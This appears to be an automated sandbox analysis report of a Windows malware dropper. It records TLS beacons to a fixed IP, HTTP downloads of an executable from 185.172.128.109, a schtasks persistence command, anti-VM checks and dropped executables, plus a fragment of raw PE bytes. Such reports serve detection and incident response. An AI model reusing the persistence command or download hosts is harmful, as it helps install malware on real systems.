TLSv1 192.168.56.101:50390 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50199 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50233 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50248 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50205 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50249 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50218 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50250 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50232 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50253 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50254 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50258 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50260 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50264 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50236 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50272 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50242 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50279 154.92.15.189:443	C=US, O=Let's Encrypt, CN=R3	CN=i.alie3ksgaa.com	e3:88:72:04:24:5c:12:17:a4:e2:c1:d9:33:f0:d9:60:91:71:d3:dc
TLSv1 192.168.56.101:50245 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50286 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:49290 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50255 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50287 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50266 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50290 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50270 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50305 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50280 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50311 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50282 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:49374 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50320 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50288 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50321 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50293 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50324 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50299 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50325 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50301 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50329 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50302 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50331 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50315 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50333 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50316 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50335 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50322 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50352 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50346 154.92.15.189:443	C=US, O=Let's Encrypt, CN=R3	CN=i.alie3ksgaa.com	e3:88:72:04:24:5c:12:17:a4:e2:c1:d9:33:f0:d9:60:91:71:d3:dc
TLSv1 192.168.56.101:50371 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50217 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50377 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50219 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50353 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50379 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50221 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50355 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50225 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50356 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50227 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50360 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50238 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50366 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50240 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50378 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50268 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50380 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50273 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50381 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50383 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50278 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50386 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50283 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50388 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50284 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50389 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50298 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50303 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50310 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50314 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50332 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50336 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50338 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50342 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50351 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50359 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50362 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50368 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50369 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50374 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50382 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50385 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50146 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50149 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50154 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50164 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50166 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50181 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50182 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50185 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50186 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50200 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50204 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50214 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50222 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50229 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50231 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50234 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50243 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50261 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50263 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50271 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50274 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50285 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50289 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50292 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50294 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50306 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50308 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50312 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50317 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50326 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50327 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50330 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50344 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50345 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50347 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50350 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50358 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50361 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50364 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50372 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50373 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50375 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50376 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50391 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50392 154.92.15.189:443	None	None	None

Queries for the computername (1 event)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameW Jan. 30, 2024, 7:51 a.m.	computer_name: TEST22-PC	1	1	0

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Jan. 30, 2024, 7:51 a.m.			0	0
IsDebuggerPresent Jan. 30, 2024, 7:51 a.m.			0	0

Command line console output was observed (7 events)

Time & API	Arguments	Status	Return
WriteConsoleW Jan. 30, 2024, 7:51 a.m.	buffer: C:\Users\test22\AppData\Roaming\Temp> console_handle: 0x00000007	1	1
WriteConsoleW Jan. 30, 2024, 7:51 a.m.	buffer: chcp console_handle: 0x00000007	1	1
WriteConsoleW Jan. 30, 2024, 7:51 a.m.	buffer: C:\Users\test22\AppData\Roaming\Temp> console_handle: 0x00000007	1	1
WriteConsoleW Jan. 30, 2024, 7:51 a.m.	buffer: schtasks console_handle: 0x00000007	1	1
WriteConsoleW Jan. 30, 2024, 7:51 a.m.	buffer: /create /tn "MalayamaraUpdate" /tr "'C:\Users\test22\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F console_handle: 0x00000007	1	1
WriteConsoleW Jan. 30, 2024, 7:51 a.m.	buffer: Active code page: 1251 console_handle: 0x00000013	1	1
WriteConsoleW Jan. 30, 2024, 7:51 a.m.	buffer: SUCCESS: The scheduled task "MalayamaraUpdate" has successfully been created. console_handle: 0x00000007	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Jan. 30, 2024, 7:51 a.m.		1	1	0

One or more processes crashed (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ Jan. 30, 2024, 7:51 a.m.	stacktrace: CopyPDBs+0x1b552 DllCanUnloadNowInternal-0x25a85 clr+0x1b1194 @ 0x72951194 LogHelp_TerminateOnAssert+0x14061 GetPrivateContextsPerfCounters-0x53e1 clr+0x82ba1 @ 0x72822ba1 0x4f0569 0x4f045b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x727a2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x727b264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x727b2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x728674ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72867610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x728f1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x728f1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x728f1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x728f416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7415f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x741d7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x741d4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0xe0434f4e exception.offset: 46887 exception.address: 0x7597b727 registers.esp: 4321856 registers.edi: 0 registers.eax: 4321856 registers.ebp: 4321936 registers.edx: 0 registers.ebx: 9363280 registers.esi: 8951472 registers.ecx: 2332514986	1	0	0

Time & API

Arguments

Status

Return

Repeated

__exception__

Jan. 30, 2024, 7:51 a.m.

stacktrace:

CopyPDBs+0x1b552 DllCanUnloadNowInternal-0x25a85 clr+0x1b1194 @ 0x72951194
LogHelp_TerminateOnAssert+0x14061 GetPrivateContextsPerfCounters-0x53e1 clr+0x82ba1 @ 0x72822ba1
0x4f0569
0x4f045b
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x727a2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x727b264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x727b2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x728674ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72867610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x728f1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x728f1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x728f1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x728f416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7415f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x741d7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x741d4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0xe0434f4e
exception.offset: 46887
exception.address: 0x7597b727
registers.esp: 4321856
registers.edi: 0
registers.eax: 4321856
registers.ebp: 4321936
registers.edx: 0
registers.ebx: 9363280
registers.esi: 8951472
registers.ecx: 2332514986

HTTP traffic contains suspicious features which may be indicative of malware related traffic (2 events)

suspicious_features	Connection to IP address				suspicious_request	GET http://185.172.128.90/cpa/ping.php?substr=nine&s=ab
suspicious_features	Connection to IP address				suspicious_request	GET http://185.172.128.109/syncUpd.exe

Performs some HTTP requests (3 events)

request	GET http://185.172.128.90/cpa/ping.php?substr=nine&s=ab
request	GET http://apps.identrust.com/roots/dstrootcax3.p7c
request	GET http://185.172.128.109/syncUpd.exe

Allocates read-write-execute memory (usually to unpack itself) (23 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Jan. 30, 2024, 7:51 a.m.	process_identifier: 2548 region_size: 2293760 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00960000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 30, 2024, 7:51 a.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 30, 2024, 7:51 a.m.	process_identifier: 2548 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x727a1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 30, 2024, 7:51 a.m.	process_identifier: 2548 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x727a2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 30, 2024, 7:51 a.m.	process_identifier: 2548 region_size: 1572864 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00c90000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 30, 2024, 7:51 a.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00dd0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 30, 2024, 7:51 a.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x002e2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 30, 2024, 7:51 a.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00315000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 30, 2024, 7:51 a.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0031b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 30, 2024, 7:51 a.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00317000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 30, 2024, 7:51 a.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x002fc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 30, 2024, 7:51 a.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 30, 2024, 7:51 a.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x002ea000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 30, 2024, 7:51 a.m.	process_identifier: 2636 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x735f2000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 30, 2024, 7:51 a.m.	process_identifier: 2692 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 57344 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00264000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 30, 2024, 7:51 a.m.	process_identifier: 2692 region_size: 45056 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00520000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 30, 2024, 7:51 a.m.	process_identifier: 2736 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4161536 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00f30000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 30, 2024, 7:51 a.m.	process_identifier: 2736 region_size: 9351168 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 30, 2024, 7:44 a.m.	process_identifier: 2788 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000ff08d000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Jan. 30, 2024, 7:51 a.m.	process_identifier: 2896 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x735f2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 30, 2024, 7:51 a.m.	process_identifier: 2896 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 30, 2024, 7:51 a.m.	process_identifier: 2804 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 57344 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x007ed000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 30, 2024, 7:51 a.m.	process_identifier: 2804 region_size: 114688 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00330000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (8 events)

Time & API	Arguments	Status	Return
GetDiskFreeSpaceExW Jan. 30, 2024, 7:51 a.m.	total_number_of_free_bytes: 13301559296 free_bytes_available: 13301559296 root_path: C: total_number_of_bytes: 34252779520	1	1
GetDiskFreeSpaceExW Jan. 30, 2024, 7:51 a.m.	total_number_of_free_bytes: 13307293696 free_bytes_available: 13307293696 root_path: C: total_number_of_bytes: 34252779520	1	1
GetDiskFreeSpaceExW Jan. 30, 2024, 7:51 a.m.	total_number_of_free_bytes: 13415026688 free_bytes_available: 13415026688 root_path: C: total_number_of_bytes: 34252779520	1	1
GetDiskFreeSpaceExW Jan. 30, 2024, 7:51 a.m.	total_number_of_free_bytes: 13415776256 free_bytes_available: 13415776256 root_path: C: total_number_of_bytes: 34252779520	1	1
GetDiskFreeSpaceExW Jan. 30, 2024, 7:51 a.m.	total_number_of_free_bytes: 13461782528 free_bytes_available: 13461782528 root_path: C: total_number_of_bytes: 34252779520	1	1
GetDiskFreeSpaceExW Jan. 30, 2024, 7:51 a.m.	total_number_of_free_bytes: 13461782528 free_bytes_available: 13461782528 root_path: C: total_number_of_bytes: 34252779520	1	1
GetDiskFreeSpaceExW Jan. 30, 2024, 7:51 a.m.	total_number_of_free_bytes: 13461782528 free_bytes_available: 13461782528 root_path: C: total_number_of_bytes: 34252779520	1	1
GetDiskFreeSpaceExW Jan. 30, 2024, 7:51 a.m.	total_number_of_free_bytes: 13461782528 free_bytes_available: 13461782528 root_path: C: total_number_of_bytes: 34252779520	1	1

Creates executable files on the filesystem (7 events)

file	C:\Users\test22\AppData\Roaming\Temp\Task.bat
file	C:\Users\test22\AppData\Local\Temp\nszFB1A.tmp\INetC.dll
file	C:\Users\test22\AppData\Local\Temp\InstallSetup9.exe
file	C:\Users\test22\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
file	C:\Users\test22\AppData\Local\Temp\BroomSetup.exe
file	C:\Users\test22\AppData\Local\Temp\rty25.exe
file	C:\Users\test22\AppData\Local\Temp\toolspub1.exe

Creates a suspicious process (1 event)

cmdline

schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\test22\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F

Drops a binary and executes it (4 events)

file	C:\Users\test22\AppData\Local\Temp\InstallSetup9.exe
file	C:\Users\test22\AppData\Local\Temp\toolspub1.exe
file	C:\Users\test22\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
file	C:\Users\test22\AppData\Local\Temp\rty25.exe

Drops an executable to the user AppData folder (10 events)

file	C:\Users\test22\AppData\Local\Temp\SandboxieInstall.exe
file	C:\Users\test22\AppData\Local\Temp\BroomSetup.exe
file	C:\Users\test22\AppData\Local\Temp\202005191702_6d173b9549ce4fe1e5ada5ab9ce0bfff5d9569f19e7fa916db5c8d4f0dace63b_setup_nwc275a_demo.exe
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BYECVYBT\winamp58_3660_beta_full_en-us[1].exe
file	C:\Users\test22\AppData\Local\Temp\toolspub1.exe
file	C:\Users\test22\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
file	C:\Users\test22\AppData\Local\Temp\workforroc.exe
file	C:\Users\test22\AppData\Local\Temp\InstallSetup9.exe
file	C:\Users\test22\AppData\Local\Temp\nsqFF70.tmp
file	C:\Users\test22\AppData\Local\Temp\nszFB1A.tmp\INetC.dll

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Jan. 30, 2024, 7:44 a.m.	flags: 15 family: 0		111	0

An executable file was downloaded by the process installsetup9.exe (1 event)

Time & API	Arguments	Status	Return	Repeated
InternetReadFile Jan. 30, 2024, 7:51 a.m.	buffer: MZÿÿ¸@ðº´ Í!¸LÍ!This program cannot be run in DOS mode. $OÀ '¡ct¡ct¡ctd×ýt¡ctd×Étz¡ctd×Èt/¡ctÙðt¡ct¡btm¡ctd×Ìt ¡ctd×ùt ¡ctd×þt ¡ctRich¡ctPELþðbà &(-@@à"Û,<0à0Ðs@ .textÚ$& `.rdataÊK@L*@@.data"v@À.tlsÍ @À.rsrcà 02¢@@ÝD$éYÌÌÌÌÌÌÌÙD$ìÝ$èñÄÃÌÌÌÌÌÌÌÌÌÌÌÌÌQ$PÎÇD$è®ÇBCÆYÃÌÌÇBCéóÌÌÌÌÌVñÇBCèàöD$t Vè"ÄÆ^ÂÌÌÌÌÌÌÌÌÌÌÌÌP@Éuù+ÂÃÌÌÌPQRèhïÄÃÌÌÌÌPQRè¨ÄÃÌÌÌÌ ÃÌÌÌÌÌÌÌÌÌÌÌVñÈWÇFÇFÆyAÒuù+Ïùè0_Æ^ÃÌÌÌÌÌÌÌÌÌÌÌS3ÛÇF^;÷tL~rPèlÄÇF^sOAQWVèÄëGFON__Æ[ÃÌÌÌÌÌÌÌÌÌÌÌÌÌ~rPèÄÇFÇFÆÃÌÌÌÌÌÌÌÌÌÌÌÌÌ@ÃÌÌÌÌÌÌÌÌÌÌÌÌ3ÉHHÃÌÌÌÌÌOVð;ñsG;ÆwA+ð¸$I÷îÖÁúòÁîò;OuÏè?õ+ÆORèXÄG^Ã;OuÏèOVè:GÄ^ÃÌ;÷t]~rPèKÄÇFÇFÆsOAQWVèèÄë ÇGFONÇGÇGÆÃÌÌÌÌÌÌÌÌÌÌÌÌVÈWqAÒuù+Ît$ùèe_^Â\|$t"~rSÿtWSVè$íÄSè¨Ä[ÇF~Æ7ÂÌÌÌÌÌÌÂÌÌÌÌÌÌÌÌÌÌÌÌÌ;As 9w¸Ã3ÀÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌSVq+ó¸$I÷îÖÁúòÁîòþH$ v h$pCèjWy+û¸$I÷ï×ÁúÂÁèFÂ;ðv!ÐÑê¿I$ +ú;øs3ÀëÂ;ÆsÆPè_^[ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌV3öt!W{;÷t è«ýÿÿÆ;÷uôPè¹Ä_ÇÇCÇC^ÃÌÌ3ÉHHÂÌÌÌÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌSPÈÿ3ÛèÔ[ÃÌÌSØÛtKNùrëÆ;Ør9ùrëÆVÐ;Óv%ùr+ØVÇÎè[ÃÆ+ØVÇÎè[Ãÿþv h8pCèGF;ÇsFPWVèMÿtL~r ëÿuò~ør 